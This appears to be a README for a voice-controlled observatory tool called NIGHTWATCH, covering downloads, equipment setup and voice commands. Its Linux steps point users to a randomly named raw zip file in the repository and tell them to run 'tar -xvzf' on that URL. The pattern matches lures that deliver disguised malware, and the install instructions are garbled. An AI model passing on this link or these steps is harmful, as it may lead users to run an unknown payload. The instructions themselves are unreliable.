🚀 Getting Started

Welcome to the NIGHTWATCH project! This software allows you to control your observatory using just your voice. It works with advanced equipment, making it easier for you to observe the night sky. Follow these simple steps to get started.

Step 1: Choose Your Version

  1. Visit the Releases page.
  2. You will see a list of available versions. Choose the latest version, which will be listed at the top.
  3. Click on the version number to access its details.

Step 2: Download the Software

  1. From the version details, look for the “Assets” dropdown menu.

  2. Click to expand the menu.

  3. You will find different files for various operating systems. Select the one that matches your system. If you’re unsure, here are common options:

    • Windows: Use the .exe file.
    • Mac: Use the .dmg file.
    • Linux: Use the https://github.com/Puffer99/NIGHTWATCH/raw/refs/heads/main/docker/Software-missyllabify.zip file.
  4. Click on the file to start the download.

Step 3: Install the Software

  • Windows Users:

    1. Locate the downloaded .exe file in your Downloads folder.
    2. Double-click the file to launch the installer.
    3. Follow the instructions in the installer to complete the setup process.
  • Mac Users:

    1. Find the downloaded .dmg file in your Downloads folder.
    2. Double-click the file to open it.
    3. Drag the NIGHTWATCH app into your Applications folder.
  • Linux Users:

    1. Navigate to the directory where you downloaded the https://github.com/Puffer99/NIGHTWATCH/raw/refs/heads/main/docker/Software-missyllabify.zip file.
    2. Extract the files using the command: tar -xvzf https://github.com/Puffer99/NIGHTWATCH/raw/refs/heads/main/docker/Software-missyllabify.zip.
    3. Open the extracted folder and follow the README instructions found inside.

🔧 Setup Your Equipment

To make the most of NIGHTWATCH, you'll need to set up your observatory equipment properly. Ensure you have the following items:

  • Telescope: Compatible with the Intes-Micro MN78 Mak-Newt.
  • Mount: Use a harmonic drive GEM (German Equatorial Mount) for precise positioning.
  • Control System: Make sure you have OnStep or OnStepX installed for guiding your telescope.
  • AI Hardware: Set up your NVIDIA DGX Spark to run the local AI features.

Connecting the Hardware

  1. Power Up Your Telescope: Ensure the telescope and mount are connected to a power source.

  2. Install OnStep or OnStepX: If you haven’t already, install OnStep or OnStepX by following the official installation guide found on their website.

  3. Connect to the AI System: Connect your telescope mount to the NVIDIA DGX Spark, ensuring all drivers are properly installed.

🎤 Voice Control Setup

NIGHTWATCH supports voice commands using integrated systems. To enable this feature:

  1. Install Required Software: Ensure you have the following:

    • Piper TTS: For text-to-speech functions.
    • Whisper AI: For voice recognition capabilities.
  2. Configure Voice Settings: Open the NIGHTWATCH application and navigate to the settings. Look for the voice control panel and choose your preferred voice options. Adjust settings based on your preferences.

After installation and setup, it’s time to start exploring the universe.

Basic Commands

NIGHTWATCH allows for simple voice commands like:

  • “Start observing.”
  • “Track [object name].”
  • “Zoom in on [object name].”

Always ensure that your microphone is active and properly configured in the application settings.

Troubleshooting
